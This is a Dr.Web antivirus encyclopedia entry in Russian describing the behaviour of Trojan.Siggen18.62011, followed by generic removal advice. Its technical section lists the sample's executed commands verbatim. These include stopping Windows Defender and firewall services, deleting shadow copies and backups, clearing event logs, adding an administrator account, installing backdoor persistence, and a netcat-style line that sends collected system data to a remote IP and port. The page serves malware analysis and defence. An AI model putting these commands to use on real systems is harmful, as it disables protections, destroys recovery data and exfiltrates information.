Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen18.62011

Добавлен в вирусную базу Dr.Web: 2022-10-21

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
  • [<HKLM>\SYSTEM\CurrentControlSet\Services\SecurityHealthService] 'Start' = '00000001'
  • [<HKLM>\SYSTEM\CurrentControlSet\Services\wscsvc] 'start' = '00000001'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
  • Диспетчера задач (Taskmgr)
  • Центр обеспечения безопасности (Security Center)
  • Системный антивирус (Защитник Windows)
блокирует:
  • Средство контроля пользовательских учетных записей (UAC)
  • Центр обеспечения безопасности (Security Center)
удаляет теневые копии разделов.
Запускает на исполнение
  • '%WINDIR%\syswow64\net.exe' stop "wuauserv"
  • '%WINDIR%\syswow64\net.exe' stop "wscsvc"
  • '%WINDIR%\syswow64\net.exe' stop "Sense"
  • '%WINDIR%\syswow64\net.exe' stop "WdNisSvc"
  • '%WINDIR%\syswow64\net.exe' stop "WinDefend"
  • '%WINDIR%\syswow64\net.exe' stop "mpssvc"
  • '%WINDIR%\syswow64\net.exe' stop "EventLog"
  • '%WINDIR%\syswow64\net.exe' stop "WSearch"
  • '%WINDIR%\syswow64\net.exe' stop "SDRSVC"
  • '%WINDIR%\syswow64\net.exe' stop "SecurityHealthService"
  • '%WINDIR%\syswow64\net.exe' stop "DPS"
  • '%WINDIR%\syswow64\net.exe' stop "EFS"
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\nsh8f16.tmp
  • %TEMP%\nsm954e.tmp\inetc.dll
  • C:\potentiallyunwanted.exe
  • %TEMP%\nsm954e.tmp\nsexec.dll
  • %TEMP%\info.txt
Сетевая активность
Подключается к
  • 'se####.eicar.org':443
  • 'am###.eicar.org':443
  • 'am###.eicar.org':80
TCP
Запросы HTTP GET
  • http://am###.eicar.org/PotentiallyUnwanted.exe
Другие
  • 'se####.eicar.org':443
  • 'am###.eicar.org':443
UDP
  • DNS ASK se####.eicar.org
  • DNS ASK am###.eicar.org
Другое
Ищет следующие окна
  • ClassName: 'MS_AutodialMonitor' WindowName: ''
  • ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
  • '%WINDIR%\syswow64\cmd.exe' schtasks /DELETE /TN gimotti /F' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c getmac /v >> %TEMP%\info.txt' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c systeminfo >> %TEMP%\info.txt' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators admin /add' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c net user admin /add' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c net user administrator /active:yes' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "EFS"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "DPS"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "SecurityHealthService"' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c net user >> %TEMP%\info.txt' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "SDRSVC"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "EventLog"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "mpssvc"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "WinDefend"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "WdNisSvc"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "Sense"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "wscsvc"' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "wuauserv"' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' powershell start-process powershell -verb runas' (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' stop "WSearch"' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\svchost.exe -w 2 192.168.244.129 8888 < %TEMP%\info.txt' (со скрытым окном)
Запускает на исполнение
  • '%WINDIR%\syswow64\cmd.exe' schtasks /DELETE /TN gimotti /F
  • '%WINDIR%\syswow64\cmd.exe' /c getmac /v >> %TEMP%\info.txt
  • '%WINDIR%\syswow64\getmac.exe' /v
  • '%WINDIR%\syswow64\cmd.exe' /c net user >> %TEMP%\info.txt
  • '%WINDIR%\syswow64\net.exe' user
  • '%WINDIR%\syswow64\net1.exe' user
  • '%WINDIR%\syswow64\cmd.exe' schtasks /CREATE /tn "malware" /TR "C:\backdoor1.exe" /SC daily /st 09:00:00 /ru "system"
  • '%WINDIR%\syswow64\cmd.exe' bcdedit /set {default} recoveryenabled no
  • '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\svchost.exe -w 2 192.168.244.129 8888 < %TEMP%\info.txt
  • '%WINDIR%\syswow64\cmd.exe' wbadmin delete systemstatebackup -keepversion:()
  • '%WINDIR%\syswow64\cmd.exe' schtasks.exe /create /RU SYSTEM /F /RL HIGHEST /TR "%ProgramFiles(x86)%\Naver\Naver Whale\Application\2.7.98.22\whale_update.exe" !@Whale:TheBestBrowserEver@!" /TN WhaleUpdateD /SC DAILY /DU 24...
  • '%WINDIR%\syswow64\net1.exe' stop "EFS"
  • '%WINDIR%\syswow64\cmd.exe' wbadmin delete backup
  • '%WINDIR%\syswow64\cmd.exe' wbadmin delete catalog -quiet
  • '%WINDIR%\syswow64\cmd.exe' wbadmin delete systemstatebackup
  • '%WINDIR%\syswow64\cmd.exe' wmic shadowcopy delete
  • '%WINDIR%\syswow64\cmd.exe' vssadmin delete shadows /all /quiet
  • '%WINDIR%\syswow64\wevtutil.exe' clear-log Application
  • '%WINDIR%\syswow64\wevtutil.exe' clear-log Security
  • '%WINDIR%\syswow64\wevtutil.exe' clear-log System
  • '%WINDIR%\syswow64\sc.exe' config EventLog start= disabled
  • '%WINDIR%\syswow64\reg.exe' delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
  • '%WINDIR%\syswow64\reg.exe' delete "HKEY_CURENT_USER\Software\Microsoft\Terminal Server Client\Server" /f
  • '%WINDIR%\syswow64\net.exe' localgroup administrators admin /add
  • '%WINDIR%\syswow64\net1.exe' localgroup administrators admin /add
  • '%WINDIR%\syswow64\systeminfo.exe'
  • '%WINDIR%\syswow64\net1.exe' user admin /add
  • '%WINDIR%\syswow64\net.exe' user admin /add
  • '%WINDIR%\syswow64\net1.exe' stop "wuauserv"
  • '%WINDIR%\syswow64\net1.exe' stop "wscsvc"
  • '%WINDIR%\syswow64\net1.exe' stop "Sense"
  • '%WINDIR%\syswow64\net1.exe' stop "WdNisSvc"
  • '%WINDIR%\syswow64\net1.exe' stop "WinDefend"
  • '%WINDIR%\syswow64\net1.exe' stop "mpssvc"
  • '%WINDIR%\syswow64\net1.exe' stop "EventLog"
  • '%WINDIR%\syswow64\net1.exe' stop "WSearch"
  • '%WINDIR%\syswow64\net1.exe' stop "SDRSVC"
  • '%WINDIR%\syswow64\net1.exe' stop "SecurityHealthService"
  • '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
  • '%WINDIR%\syswow64\cmd.exe' bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • '%WINDIR%\syswow64\net1.exe' stop "DPS"
  • '%WINDIR%\syswow64\cmd.exe' sc create malservice binPath= "c:\backdoor1.exe" start= auto<SYSTEM32>
  • '%WINDIR%\syswow64\rundll32.exe' javascript:"\..\mshtml,RunHTMLApplication ";
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' GET-ExecutionPolicy ByPass -File "%ProgramFiles%\AVG\Antivirus\setup\UninstallExchange.ps1" "%ProgramFiles%\AVG\Antivirus\AsEx.dll"
  • '%WINDIR%\syswow64\cmd.exe' netsh advfirewall firewall add rule name="RAONKSVC" dir=in action=allow program="%ALLUSERSPROFILE%\RAONWIZ\RAON K\raonk.svc.exe" enable=yes
  • '%WINDIR%\syswow64\cmd.exe' /c net user administrator /active:yes
  • '%WINDIR%\syswow64\cmd.exe' /c net user admin /add
  • '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators admin /add
  • '%WINDIR%\syswow64\cmd.exe' /c systeminfo >> %TEMP%\info.txt
  • '%WINDIR%\syswow64\net.exe' user administrator /active:yes
  • '%WINDIR%\syswow64\net1.exe' user administrator /active:yes
  • '%WINDIR%\syswow64\cmd.exe' powershell start-process powershell -verb runas
  • '%WINDIR%\syswow64\cmd.exe' reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mal /t REG_SZ /d "C:\backdoor1.exe"
  • '%WINDIR%\syswow64\attrib.exe' "%userprofile%\documents\Default.rdp" -s -h

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке